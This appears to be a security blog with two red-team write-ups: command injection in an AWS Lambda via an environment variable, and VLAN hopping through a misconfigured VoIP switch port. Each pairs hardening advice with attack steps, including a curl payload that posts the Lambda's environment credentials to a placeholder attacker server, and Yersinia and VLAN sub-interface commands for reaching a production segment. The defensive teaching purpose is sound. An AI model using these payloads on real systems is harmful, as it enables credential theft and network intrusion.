    def lambda_handler(event, context):
        # Retrieve the command prefix from environment variables
        # This is the critical vulnerability point
        command_prefix = os.environ.get("VALIDATION_SCRIPT_PATH", "/usr/bin/python /opt/validation_logic.py")
        
        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
    
        # Construct the full command. The vulnerability is that command_prefix
        # is treated as part of the shell command, not just a path.
        full_command = f"{command_prefix} --transaction-id {transaction_id}"
        
        print(f"Executing validation command: {full_command}")
        
        try:
            # DANGER: shell=True allows command injection via command_prefix
            result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
    

    The default VALIDATION_SCRIPT_PATH was set to /usr/bin/python /opt/validation_logic.py. The developers intended for this to be a fixed script execution. However, because shell=True was used, any shell metacharacters in the command_prefix would be interpreted by the shell.

    💥 Exploitation Walkthrough

    Our initial foothold wasn't directly on the Lambda function. We had identified a misconfigured CI/CD pipeline that, through a series of chained permissions, allowed us to assume an IAM role with lambda:UpdateFunctionConfiguration permissions for the TransactionProcessorLambda. This was our golden ticket. With these permissions, we could modify the Lambda's environment variables.

    Our goal was to achieve RCE. We decided to demonstrate this by exfiltrating sensitive environment variables (which often contain AWS credentials for the Lambda's execution role) to an attacker-controlled server. First, we needed to modify the VALIDATION_SCRIPT_PATH environment variable. We used the AWS CLI for this, assuming we had the necessary IAM permissions:

    # Step 1: Modify the Lambda's environment variable
    # The payload injects a new command using a shell metacharacter (;).
    # The original script still runs first, so the validation step looks normal.
    # curl then sends the Lambda's environment variables to our listener,
    # and a trailing echo finishes the command line.
    
    ATTACKER_SERVER="http://your-attacker-ip:8000"
    LAMBDA_NAME="TransactionProcessorLambda"
    
    aws lambda update-function-configuration \
        --function-name ${LAMBDA_NAME} \
        --environment "Variables={VALIDATION_SCRIPT_PATH='/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '}"
    

    Let's break down that payload for VALIDATION_SCRIPT_PATH:

    '/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '
    • /usr/bin/python /opt/validation_logic.py: This is the original, legitimate part of the command.
    • ;: This is the critical shell metacharacter. It separates the legitimate command from our injected command. The shell will execute the first command, then the second.
    • curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil: This is our injected command.
      • curl -X POST: Initiates an HTTP POST request.
      • -d "$(env)": The $(env) command substitution executes the env command (which lists all environment variables) and captures its output. This output is then sent as the data body of the POST request.
      • ${ATTACKER_SERVER}/exfil: Our controlled server endpoint where we're listening for exfiltrated data.
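    • ; echo 'Injection successful': Another command separator, followed by a simple echo. Because ; does not short-circuit, the echo runs even if the curl fails, and it leaves a small indicator in the Lambda logs if we were monitoring them. It also shapes what the handler sees: the Lambda appends --transaction-id <id> to the string, so those tokens become harmless arguments to echo, and the shell's exit status is echo's 0, which means check=True never raises. The final single quote closes the string.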
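
The exit-status point in the breakdown above can be checked with harmless commands. In this sketch `false` stands in for a failing first command and `echo injected` for the injected one; both are placeholders chosen for illustration, and only the string construction mirrors the vulnerable handler.

```python
import subprocess

# Hypothetical stand-in payload: a failing first command, then an injected one.
command_prefix = "false; echo injected"
transaction_id = "TXN12345"

# Same string construction as the vulnerable handler.
full_command = f"{command_prefix} --transaction-id {transaction_id}"

# check=True only inspects the shell's exit status, which is that of the LAST command.
result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)

print(result.returncode)      # 0, even though `false` failed
print(result.stdout.strip())  # injected --transaction-id TXN12345
```

No `CalledProcessError` is raised, so from the handler's point of view the tampered invocation looks like a successful validation.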

    After updating the environment variable, we simply needed to trigger the Lambda function. Since it was exposed via API Gateway, a simple HTTP POST request to its endpoint was sufficient:

    # Step 2: Trigger the Lambda function (e.g., via API Gateway)
    # This would be a normal transaction request from a client application.
    
    API_GATEWAY_URL="https://your-api-gateway-id.execute-api.us-east-1.amazonaws.com/prod/transactions"
    
    curl -X POST -H "Content-Type: application/json" \
         -d '{"transaction_id": "TXN12345", "amount": 100.00, "currency": "USD"}' \
         ${API_GATEWAY_URL}
    

    On our attacker-controlled server (listening on port 8000), we immediately received an incoming POST request containing all of the Lambda's environment variables, including the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN for the Lambda's execution role. These temporary credentials granted us full programmatic access to whatever resources the Lambda's role had permissions for – which, in this case, was extensive, including DynamoDB, S3, and even some internal network access.

    This was a critical RCE. With these credentials, we could have:

    • Read, modified, or deleted transaction data from DynamoDB.
    • Accessed sensitive audit logs from S3.
    • Pivoted to other AWS services or even internal networks if the role had appropriate permissions.
    • Deployed further malicious code or backdoors.

    The impact was immediate and severe, demonstrating a complete compromise of the core payment processing function.

    🛡 Defensive Hardening Blueprint

    Remediating this vulnerability requires a multi-layered approach, focusing on secure coding practices, least privilege, and robust configuration management. The primary fix is to eliminate the use of shell=True with dynamically constructed commands and to separate command arguments from the command itself.

    Pros
    • Eliminates Command Injection: By passing arguments as a list to subprocess.run() and avoiding shell=True, shell metacharacters are no longer interpreted.
    • Clear Separation of Concerns: Script path and arguments are distinct, reducing ambiguity.
    • Improved Security Posture: Significantly reduces the attack surface for RCE via environment variables.
    • Minimal Code Change: The core logic remains similar, making it easier to implement.
    • Standard Practice: Aligns with secure coding guidelines for executing external processes.

    Cons
    • Requires Code Modification: Not a configuration-only fix; the Lambda code itself needs updating.
    • Potential for Misconfiguration: If VALIDATION_ARGS is still poorly managed or contains malicious content, the script might receive unexpected arguments, though RCE is prevented.
    • Increased Complexity for Dynamic Commands: If the original intent was to run highly dynamic, shell-dependent commands, this approach requires refactoring that logic into the application itself or using a safer command parser.
    • Dependency on shlex: While standard, it adds a small layer of parsing logic. For truly static arguments, a simple list is even safer.
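
To make the shlex trade-off concrete, here is a small sketch of what `shlex.split()` does with the injected value from the walkthrough. The child process is only a stand-in for the validation script (it prints its own argv), and the listener URL is the write-up's placeholder, not a real endpoint.

```python
import shlex
import subprocess
import sys

# The injected value from the walkthrough, with the listener URL left as a placeholder.
tampered = '/opt/validation_logic.py; curl -X POST -d "$(env)" http://your-attacker-ip:8000/exfil'

# shlex.split applies shell-style quoting rules but never executes anything.
args = shlex.split(tampered)

# Stand-in for the validation script: a child Python process that prints its argv.
child = [sys.executable, "-c", "import sys; print(sys.argv[1:])"]
result = subprocess.run(child + args, capture_output=True, text=True, check=True)

print(result.stdout.strip())
```

The `;` stays glued to the first token and `$(env)` arrives as literal text, so nothing is executed. The script would still receive unexpected arguments, which is exactly the residual risk listed under Cons.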

    Beyond this specific code fix, a comprehensive hardening blueprint would also include:

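    • Least Privilege IAM: Ensure the Lambda's execution role has only the absolute minimum permissions required, and restrict lambda:UpdateFunctionConfiguration to the deployment roles that genuinely need it. In this engagement that permission was reachable through the CI/CD role chain, which is what put the environment variable under attacker control.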
    • Input Validation: Even if environment variables are "trusted," always validate and sanitize any data derived from them, especially if it influences command execution or file paths.
    • Static Application Security Testing (SAST): Integrate SAST tools into the CI/CD pipeline to automatically detect patterns like subprocess.run(..., shell=True) or dynamic command construction.
    • Runtime Application Self-Protection (RASP): Consider RASP solutions for critical functions to detect and block malicious command execution attempts at runtime.
    • Regular Security Audits: Periodically review Lambda configurations, environment variables, and IAM policies.
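
As one possible aid for the audit item above, the following sketch flags environment variable values that contain shell metacharacters. It assumes the variables have already been fetched into a plain dict (for example from the `Environment.Variables` field of a function's configuration); the function name and the regular expression are illustrative choices, and the check is a review heuristic, not a sanitizer.

```python
import re
from typing import Dict, List

# Characters and sequences with special meaning to /bin/sh.
# Heuristic only: legitimate values (e.g. URLs with '&') can trigger it too.
SHELL_META = re.compile(r"[;&|`<>\n]|\$\(|\$\{")

def flag_suspicious_variables(variables: Dict[str, str]) -> List[str]:
    """Return the names of variables whose values contain shell metacharacters."""
    return sorted(name for name, value in variables.items() if SHELL_META.search(value))

sample = {
    "VALIDATION_SCRIPT_PATH": '/usr/bin/python /opt/validation_logic.py; curl -d "$(env)" http://your-attacker-ip:8000/exfil',
    "VALIDATION_CONFIG_PATH": "/etc/app/config.json",
    "LOG_LEVEL": "INFO",
}
print(flag_suspicious_variables(sample))
```

A finding here is a prompt for a human to look at the value and at who changed it, not proof of compromise.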

    Here's how the Lambda code and environment variables should be configured:

    # transaction_processor_hardened.py
    import os
    import subprocess
    import json
    import shlex # For safe splitting of shell-like strings
    
    def lambda_handler(event, context):
        # Retrieve the script path and arguments separately
        # No longer a single 'command_prefix' that can be injected
        script_path = os.environ.get("VALIDATION_SCRIPT", "/usr/bin/python")
        script_args_str = os.environ.get("VALIDATION_ARGS", "/opt/validation_logic.py") # Default arguments
    
        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
    
        # Safely parse arguments using shlex.split() if they are expected to be shell-like
        # For truly fixed arguments, a simple list is better.
        # Here, we assume VALIDATION_ARGS might contain multiple arguments.
        try:
            script_args = shlex.split(script_args_str)
        except ValueError as e:
            print(f"Error parsing VALIDATION_ARGS: {e}. Using default.")
            script_args = ["/opt/validation_logic.py"] # Fallback to a safe default
    
        # Construct the full command as a list of arguments
        # This is crucial: subprocess.run with a list does NOT invoke a shell.
        command_list = [script_path] + script_args + ["--transaction-id", transaction_id]
        
        print(f"Executing validation command: {' '.join(command_list)}")
        
        try:
            # SAFE: shell=False (default) when passing a list of arguments
            result = subprocess.run(command_list, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
    

    And the corresponding environment variables:

    # Hardened Environment Variables
    VALIDATION_SCRIPT="/usr/bin/python"
    VALIDATION_ARGS="/opt/validation_logic.py" # Arguments for the script
    

    This approach ensures that the script path and its arguments are treated as distinct elements, preventing shell metacharacter injection. The shlex.split() function is used to safely parse the arguments string into a list, but even better is to provide arguments as separate environment variables if possible, or hardcode them if they are truly static.

    📖 Lessons From the Field

    This incident, like many others I've encountered over the years, hammered home some critical lessons that often get overlooked in the rush of development:

    1. Environment Variables Are Not Inherently Safe: Trust me, my friends, this is a common misconception. Developers often treat environment variables as a secure, static configuration. But if an attacker gains the ability to modify them (which is a common privilege escalation target), they become a potent vector for injection, RCE, or data exfiltration. Always treat them as potentially untrusted input, especially if they influence command execution.
    2. shell=True is a Red Flag: Any time you see shell=True in Python's subprocess module (or similar constructs in other languages), your security alarms should be blaring. It's almost always a shortcut that introduces significant risk. It means you're handing control to the underlying shell, which will happily interpret any metacharacters an attacker might inject. Prefer passing commands as a list of arguments.
    3. The Chain is Only as Strong as its Weakest Link: Our RCE wasn't a direct hit on the Lambda. It was a chain: a misconfigured CI/CD pipeline led to IAM privilege escalation, which then allowed us to modify the Lambda's environment. Security isn't just about individual components; it's about the entire ecosystem and how they interact. A seemingly minor misconfiguration in one place can unlock critical vulnerabilities elsewhere.
    4. Security by Design, Not by Afterthought: This vulnerability could have been avoided if the design principle of "never trust input" (even configuration input) was applied from the outset. Building security in from the ground up, rather than trying to bolt it on later, is always more effective and less costly. This includes threat modeling, secure code reviews, and automated security testing throughout the development lifecycle.
    5. Assume Compromise: Even with the best defenses, assume an attacker might eventually gain some level of access. This mindset drives you to implement compensating controls like least privilege IAM roles, network segmentation, and robust logging/monitoring, so that even if one component is compromised, the blast radius is minimized and the attack is detected quickly.

    This was a critical finding, but it was also a fantastic learning opportunity for the client. It reinforced the importance of looking beyond the obvious attack vectors and understanding the subtle ways configuration choices can lead to catastrophic outcomes. If you're grappling with similar challenges in your cloud environments or want to dive deeper into these kinds of real-world attack scenarios, don't hesitate to reach out. I offer personalized security mentorship sessions and consulting. You can book a 1-on-1 with me, Debasis Bhattacharjee, at thedevdude.com or learnwithdeb.com. Let's secure the digital frontier together.

    ID: RTL-2026-001  ·  Cloud Security  ·  Severity: CRITICAL  ·  2026-05-23
    RTL-2026-002 Abusing Misconfigured VoIP VLAN to Pivot into Production Network Segment
    Network & Infra ⚠ High
    2026-05-23 18:46
    🎯 Target & Threat Context

    Picture this: a mid-sized FinTech company, let's call them "SecurePay Solutions." They handle millions of financial transactions daily, process sensitive customer data, and are under constant regulatory scrutiny (think PCI DSS, GDPR, SOX – the whole alphabet soup). Our engagement was a full-scope red team exercise. The primary objective? Demonstrate the potential for lateral movement from a typical user compromise to their crown jewels: the production database servers, application logic, and API gateways.

    Their network architecture, on paper, looked pretty solid. They had a decent firewall (FortiGate), modern Cisco Catalyst switches, and a well-defined VLAN segmentation strategy:

    • VLAN 10: User Workstations (Windows 10, Office 365, standard business apps) - 192.168.10.0/24
    • VLAN 20: Guest Wi-Fi (heavily restricted internet access) - 192.168.20.0/24
    • VLAN 30: Voice over IP (VoIP phones, IP PBX) - 192.168.30.0/24
    • VLAN 40: Servers (internal services, AD, DNS, file shares) - 192.168.40.0/24
    • VLAN 100: Production Servers (databases, core application logic, payment processing) - 192.168.100.0/24

    The core production servers on VLAN 100 were running RHEL 8, hosting PostgreSQL databases, Java Spring Boot applications, and Nginx reverse proxies. These were the systems that, if compromised, would lead to catastrophic data breaches, service outages, and regulatory nightmares. Access to VLAN 100 was supposed to be strictly controlled, only accessible from specific jump boxes on VLAN 40, and with multi-factor authentication for administrative access. No direct access from VLAN 10 or VLAN 30 was permitted.

    Our initial foothold was achieved through a targeted spear-phishing campaign. One of the finance department employees, bless their heart, clicked on a malicious link, leading to a workstation compromise on VLAN 10. Standard stuff. From there, we established persistence and began our internal reconnaissance. We knew getting from VLAN 10 to VLAN 100 directly would be tough due to firewall rules. We needed a pivot point, an overlooked pathway. And that's when our eyes landed on the humble, forgotten VoIP phone, quietly humming away on each user's desk, connected via a pass-through port to their workstation.

    The stakes were incredibly high. A successful breach of VLAN 100 wouldn't just be a red team win; it would be a stark, painful lesson for SecurePay Solutions about the real-world implications of "isolated" networks that aren't truly isolated. This is where the story gets spicy.

    🔓 Vulnerability & Attack Vector

    The vulnerability we exploited falls squarely into the category of network misconfiguration, a perennial favorite for attackers and a constant headache for network engineers. Specifically, it was a classic case of VLAN hopping, leveraging the Dynamic Trunking Protocol (DTP) and a lack of proper port security on the Cisco switches. This isn't a bug in the traditional sense, like a CVE for a software flaw; it's a design and configuration oversight that creates an exploitable condition.

    How does this arise? It's often a combination of factors:

    1. Default Switch Configurations: Many Cisco Catalyst switches ship with DTP enabled, with ports defaulting to switchport mode dynamic auto (or dynamic desirable on some older platforms). A dynamic auto port does not initiate trunking itself, but it will agree to become a trunk as soon as the connected device asks for one. While convenient for plug-and-play, it's a massive security risk if not explicitly disabled or set to access mode.
    2. "Voice VLAN" Deployment: It's common practice to connect a VoIP phone to a switch port, and then connect the user's PC to the phone's built-in switch. To accommodate this, network engineers configure the switch port to carry both data (for the PC) and voice (for the phone) traffic. This is typically done using commands like switchport access vlan [data_vlan_id] and switchport voice vlan [voice_vlan_id]. The critical mistake here is *how* the switch handles the data VLAN when a voice VLAN is also configured, especially if DTP is left enabled.
    3. Lack of Port Security: Ignoring features like switchport port-security means the switch port doesn't restrict the number of MAC addresses that can connect, nor does it prevent unknown MAC addresses from joining. This allows an attacker to introduce their own device or spoof MAC addresses without triggering any alarms.
    4. "Set It and Forget It" Mentality: VoIP phones, like many IoT devices, are deployed and then largely forgotten from a security perspective. They're seen as benign, low-risk devices, and their underlying network connectivity isn't regularly audited for potential abuse.
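
The negotiation behavior behind the first point can be written down as a small truth table. The sketch below encodes the commonly documented DTP outcomes for Cisco port modes; it assumes switchport nonegotiate is absent on both sides, and the function and constant names are made up for illustration.

```python
ACCESS = "access"
TRUNK = "trunk"
AUTO = "dynamic auto"
DESIRABLE = "dynamic desirable"
MODES = {ACCESS, TRUNK, AUTO, DESIRABLE}

def forms_trunk(local: str, neighbor: str) -> bool:
    """Return True if DTP negotiation between the two port modes yields a trunk."""
    if local not in MODES or neighbor not in MODES:
        raise ValueError(f"unknown port mode: {local!r} / {neighbor!r}")
    pair = {local, neighbor}
    if ACCESS in pair:
        return False  # an access port never becomes a trunk
    # At least one side must ask: 'trunk' and 'dynamic desirable' do, 'dynamic auto' only answers.
    return TRUNK in pair or DESIRABLE in pair

# A 'dynamic auto' switch port facing different neighbors:
for neighbor in (AUTO, DESIRABLE, ACCESS):
    print(f"{AUTO} <-> {neighbor}: trunk={forms_trunk(AUTO, neighbor)}")
```

Two dynamic auto ports stay in access mode, which is why the default looks harmless in normal operation. The trunk only appears once the neighbor behaves like a dynamic desirable port, which is the role an attacker's tooling plays.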

    Why do network engineers miss this? It's often a balance between ease of deployment and security. Enabling DTP makes life simpler, but it opens a gaping hole. The focus is on getting the voice services operational, and the subtle implications of default switch behaviors are overlooked. Furthermore, network segmentation is often viewed as a perimeter defense, with less emphasis on securing the internal "access layer" where user devices and seemingly isolated systems (like VoIP phones) reside. This directly relates to OWASP Top 10 A05:2021 Security Misconfiguration. MITRE ATT&CK has no technique dedicated to DTP abuse or VLAN hopping; the closest Enterprise mapping is T1599 (Network Boundary Bridging).

    Let's look at the contrast between a vulnerable and a hardened configuration:

    Vulnerable Configuration
    interface GigabitEthernet0/1
     switchport mode dynamic auto
     switchport voice vlan 30
    (No explicit port security)

    Hardened Configuration
    interface GigabitEthernet0/1
     switchport mode access
     switchport access vlan 10
     switchport voice vlan 30
     switchport nonegotiate
     switchport port-security
     switchport port-security maximum 2
     switchport port-security violation restrict
     switchport port-security mac-address sticky
     spanning-tree portfast
     spanning-tree bpduguard enable

    The vulnerable setup essentially tells the switch, "Hey, I'm flexible! If you want to be a trunk, let's be trunks!" The hardened setup says, "I am an access port, I belong to VLAN 10 for data and VLAN 30 for voice, and I only trust two MAC addresses. Don't even try to negotiate a trunk with me." That's the difference between an open door and a locked vault.

    
    interface GigabitEthernet0/1
     switchport mode dynamic auto
     switchport voice vlan 30
    ! This configuration implicitly allows the port to negotiate a trunk link.
    ! The PC's traffic would be untagged on VLAN 10, and the VoIP phone's
    ! traffic would be tagged for VLAN 30.
    

    Our goal was to convince the switch that *we* were another switch, and thus negotiate a trunk link. Once a trunk link is established, we can send and receive traffic for *any* VLAN configured on that trunk, effectively bypassing the intended segmentation. We achieved this by deploying a small Kali Linux VM on the compromised network segment (this could be done by booting a live USB on an accessible machine, or by tunneling traffic if direct access was restricted).
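
What "traffic for any VLAN" means on the wire is a 4-byte 802.1Q tag inserted into each Ethernet frame. The sketch below builds that tag with the standard layout (16-bit TPID 0x8100, then 3 bits of priority, 1 DEI bit, and a 12-bit VLAN ID); the helper name `dot1q_tag` is hypothetical and the code only constructs bytes, it does not send anything.

```python
import struct

TPID_8021Q = 0x8100  # EtherType value that marks an 802.1Q-tagged frame

def dot1q_tag(vlan_id: int, priority: int = 0, dei: int = 0) -> bytes:
    """Build the 4-byte 802.1Q tag for the given VLAN ID."""
    if not 1 <= vlan_id <= 4094:
        raise ValueError("VLAN ID must be between 1 and 4094")
    if not 0 <= priority <= 7:
        raise ValueError("priority must be between 0 and 7")
    if dei not in (0, 1):
        raise ValueError("dei must be 0 or 1")
    tci = (priority << 13) | (dei << 12) | vlan_id  # Tag Control Information
    return struct.pack("!HH", TPID_8021Q, tci)

print(dot1q_tag(100).hex())             # tag for the production VLAN
print(dot1q_tag(30, priority=5).hex())  # voice VLAN with a raised priority
```

On an access port the switch decides which VLAN untagged data frames belong to. On a trunk, the sender chooses by writing the VLAN ID into this field, which is why an unintended trunk defeats the segmentation.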

    💥 Exploitation Walkthrough

    Our journey began from a compromised user workstation on VLAN 10. After establishing a foothold and performing initial reconnaissance (ipconfig /all, arp -a, basic nmap scans of the local subnet), we noticed something interesting. The user's PC was connected to the network via an Ethernet cable that first plugged into the VoIP phone, and then the phone connected to the wall jack. This is a common setup for VoIP deployments to save on cabling.

    From the workstation, we could see its IP address (192.168.10.X) and the default gateway (192.168.10.1). We also observed traffic patterns that indicated the VoIP phone was indeed communicating on VLAN 30. The critical piece of information was that the switch port was configured to handle *both* the data VLAN (for the PC) and the voice VLAN (for the phone). This is where the DTP misconfiguration comes into play.

    First, we needed to identify the switch port's behavior. While we couldn't directly query the switch from the compromised workstation, the presence of a VoIP phone passing through to a PC on a different VLAN was a strong indicator of a dual-VLAN port, often configured with DTP enabled.

    From our Kali Linux machine (connected to the same physical network segment, perhaps by replacing the user's PC temporarily or by connecting to another available port in the same office if physical access was granted as part of the red team scope):

    
    # Step 1: Initial network reconnaissance (from the compromised workstation or Kali)
    # Identify local subnet, default gateway, and observe network traffic.
    # This confirms the PC is on VLAN 10 and the VoIP phone is active.
    ipconfig /all             # On Windows
    ip a                      # On Linux (ifconfig on older systems)
    nmap -sn 192.168.10.0/24  # Discover hosts on the local data VLAN
    
    # Step 2: Initiate DTP negotiation using Yersinia.
    # Yersinia is a network tool designed to exploit network vulnerabilities,
    # including DTP. We'll use it to send DTP packets to the switch,
    # attempting to force the port into trunking mode.
    # Assuming 'eth0' is our network interface connected to the switch port.
    sudo yersinia -I -D DTP -t 1 -i eth0
    
    # Yersinia will send DTP "desirable" packets. If the switch port is
    # configured with "switchport mode dynamic auto" or "dynamic desirable",
    # it will respond by forming a trunk link. The console output of Yersinia
    # will indicate if the trunk negotiation was successful.
    
    # Step 3: Verify trunk status (optional, but good practice)
    # If we had access to the switch, we'd check 'show interfaces trunk'.
    # On our Kali machine, we can now try to create a sub-interface for a target VLAN.
    
    # Step 4: Create a sub-interface for the target Production VLAN (VLAN 100).
    # Once the physical interface (eth0) is a trunk, we can create virtual
    # interfaces (sub-interfaces) for any VLAN we want to access.
    sudo ip link add link eth0 name eth0.100 type vlan id 100
    sudo ip addr add 192.168.100.100/24 dev eth0.100 # Assign an IP from the target VLAN
    sudo ip link set dev eth0.100 up
    
    # Step 5: Scan the Production Network Segment (VLAN 100).
    # With the eth0.100 interface up and configured, we can now directly
    # communicate with systems on VLAN 100 as if we were natively connected.
    nmap -sV -p- -T4 -Pn 192.168.100.0/24 -oA production_vlan_scan
    
    # This Nmap scan revealed several RHEL 8 servers, including the PostgreSQL database
    # server (192.168.100.10) and the main application server (192.168.100.11).
    # We then proceeded to exploit a weak password on a non-production-hardened
    # management interface of one of the app servers, gaining SSH access.
    # From there, it was a matter of escalating privileges and dumping database credentials.
    

    The moment we saw the Nmap results populate with hosts from 192.168.100.0/24, it was a clear victory. We had successfully hopped from a seemingly isolated user VLAN, through a neglected VoIP phone port, directly into the heart of the production network. This allowed us to bypass all intended firewall rules and access controls between VLAN 10 and VLAN 100.

    🛡 Defensive Hardening Blueprint

    The remediation for this class of vulnerability is straightforward but requires meticulous attention to detail across the entire network access layer. It's about explicitly defining port behavior and enforcing strict security policies, rather than relying on defaults or implied isolation.

    Pros
    • Completely prevents DTP-based VLAN hopping.
    • Strictly limits the number of MAC addresses per port, preventing unauthorized device connections.
    • Enhances overall network segmentation integrity.
    • Reduces the attack surface at the access layer.

    Cons
    • Increased configuration complexity and overhead.
    • Requires careful management of MAC addresses if sticky is not used or if devices frequently change.
    • Potential for legitimate device lockout if maximum is set too low or if violation shutdown is used without proper monitoring.
    • Requires thorough testing to ensure no impact on legitimate VoIP or data traffic.

    The key takeaway here is that security is about being explicit. Don't rely on defaults, and don't assume devices are benign simply because they're on a "voice" VLAN. Every port, every device, needs to be treated with suspicion until proven otherwise.
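
The lockout trade-off between the violation modes is easier to reason about with a toy model. The class below is a deliberately simplified simulation of port security with sticky-style learning; it is an illustration with made-up names, not a description of how the switch implements the feature, and it ignores aging and per-VLAN limits.

```python
from dataclasses import dataclass, field
from typing import Set

@dataclass
class SecuredPort:
    maximum: int = 2
    violation: str = "restrict"  # "restrict" or "shutdown"
    learned: Set[str] = field(default_factory=set)
    violations: int = 0
    err_disabled: bool = False

    def receive(self, src_mac: str) -> bool:
        """Return True if a frame from src_mac would be forwarded."""
        if self.err_disabled:
            return False
        if src_mac in self.learned:
            return True
        if len(self.learned) < self.maximum:
            self.learned.add(src_mac)  # learn until the limit is reached
            return True
        self.violations += 1
        if self.violation == "shutdown":
            self.err_disabled = True  # the whole port goes down
        return False

port = SecuredPort(maximum=2, violation="restrict")
for mac in ("pc", "phone", "rogue", "pc"):
    print(mac, port.receive(mac))
print("violations:", port.violations)
```

With restrict the PC and phone keep working while the third device is dropped and counted. With shutdown the first violation also cuts off the legitimate devices until someone re-enables the port.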

    Here's the hardened configuration for a port that serves a user PC and a VoIP phone:

    interface GigabitEthernet0/1
     description User PC and VoIP Phone
     switchport mode access
     switchport access vlan 10
     switchport voice vlan 30
     switchport nonegotiate
     switchport port-security
     switchport port-security maximum 2
     switchport port-security violation restrict
     switchport port-security mac-address sticky
     spanning-tree portfast
     spanning-tree bpduguard enable
    !
    ! Explanation of changes:
    ! - switchport mode access: Explicitly sets the port to access mode, preventing trunk negotiation.
    ! - switchport nonegotiate: Disables DTP on this port, even if it were in dynamic mode (belt & suspenders).
    ! - switchport port-security: Enables port security.
    ! - switchport port-security maximum 2: Allows only two MAC addresses (one for the PC, one for the VoIP phone).
    ! - switchport port-security violation restrict: If more than 2 MACs are detected, packets from unknown sources are dropped, but the port remains up.
    ! - switchport port-security mac-address sticky: Dynamically learns MAC addresses and adds them to the running configuration.
    ! - spanning-tree portfast: Speeds up port transition to forwarding state for end-devices.
    ! - spanning-tree bpduguard enable: Err-disables the port if a BPDU arrives on it, so a rogue device cannot take part in STP.
    

    This configuration ensures that the port will *never* form a trunk, it will only allow traffic for VLAN 10 (untagged) and VLAN 30 (tagged), and it will only permit a maximum of two MAC addresses. With violation restrict, frames from a third device are dropped and counted while the port stays up; violation shutdown would err-disable the port instead. Attempts to force a trunk negotiation are simply ignored.

    📖 Lessons From the Field

    This engagement, like many others, reinforced some fundamental truths about network security that often get overlooked in the rush to deploy or the focus on higher-layer threats. Here are a few hard-won insights:

    • Assume Nothing, Verify Everything: Default configurations are almost always insecure. Never assume a switch port is hardened just because it's for an "isolated" VLAN. Always explicitly configure security features like DTP disablement and port security. What you don't explicitly configure, an attacker might implicitly exploit.
    • The Weakest Link Isn't Always Obvious: Everyone focuses on servers and firewalls, but often the most vulnerable points are the neglected ones – the VoIP phones, printers, IoT devices, and even unmanaged switches. These "edge" devices are often deployed with minimal security scrutiny, yet they offer direct access to the network infrastructure.
    • Segmentation is Only as Good as Its Enforcement: Having a beautiful VLAN diagram means nothing if the underlying switch ports allow an attacker to bypass it. Firewalls between VLANs are crucial, but they can be rendered useless if an attacker can hop *into* a restricted VLAN directly from the access layer.
    • Defense in Depth Starts at Layer 2: Application security, endpoint protection, and firewalls are essential, but they are significantly more effective when the foundational network layer (Layer 2) is also secured. Don't neglect switch port security, MAC address filtering, and proper Spanning Tree Protocol (STP) hardening.
    • Regular Configuration Audits are Non-Negotiable: Network configurations drift over time. New devices are added, changes are made, and sometimes security best practices get bypassed for convenience. Regular, automated audits of switch configurations against a hardened baseline are critical to catch these misconfigurations before an attacker does.
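The last point, auditing against a hardened baseline, can be sketched in a few lines of Node.js. This is a minimal illustration, not a production tool: the `REQUIRED_LINES` baseline, the function names, and the rule that ports set to `switchport mode trunk` are intentional uplinks are all assumptions made for the example. It expects a running-config dump in the usual IOS layout, where sub-commands are indented under each `interface` line.

```javascript
// Hypothetical baseline: every access port is expected to carry these lines.
const REQUIRED_LINES = [
  'switchport mode access',
  'switchport nonegotiate',
  'switchport port-security',
  'spanning-tree bpduguard enable',
];

// Split a running-config dump into { name, lines } blocks, one per interface.
// A block ends at the first line that is not an indented sub-command.
function parseInterfaces(configText) {
  const interfaces = [];
  let current = null;
  for (const rawLine of configText.split(/\r?\n/)) {
    const header = rawLine.match(/^interface\s+(\S+)/);
    if (header) {
      current = { name: header[1], lines: [] };
      interfaces.push(current);
    } else if (current && /^\s+\S/.test(rawLine)) {
      current.lines.push(rawLine.trim());
    } else {
      current = null;
    }
  }
  return interfaces;
}

// Report each non-trunk interface that is missing baseline lines.
function auditAccessPorts(configText) {
  const findings = [];
  for (const iface of parseInterfaces(configText)) {
    // Assumption: explicitly configured trunks are intentional uplinks.
    if (iface.lines.includes('switchport mode trunk')) continue;
    const missing = REQUIRED_LINES.filter((line) => !iface.lines.includes(line));
    if (missing.length > 0) findings.push({ interface: iface.name, missing });
  }
  return findings;
}

const sampleConfig = [
  'interface GigabitEthernet1/0/1',
  ' switchport mode access',
  ' switchport nonegotiate',
  ' switchport port-security',
  ' spanning-tree bpduguard enable',
  '!',
  'interface GigabitEthernet1/0/2',
  ' switchport mode access',
  '!',
].join('\n');

console.log(JSON.stringify(auditAccessPorts(sampleConfig), null, 2));
```

Run on a schedule against exported configurations, a check like this catches ports that drifted back to negotiable defaults before an attacker finds them.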

    This wasn't just a successful red team exercise; it was a wake-up call for the client. It highlighted that even with a robust security posture at the perimeter and application layers, a single misconfigured switch port could unravel their entire network segmentation strategy. It's a reminder that security is a continuous, multi-layered effort, and the devil truly is in the details.

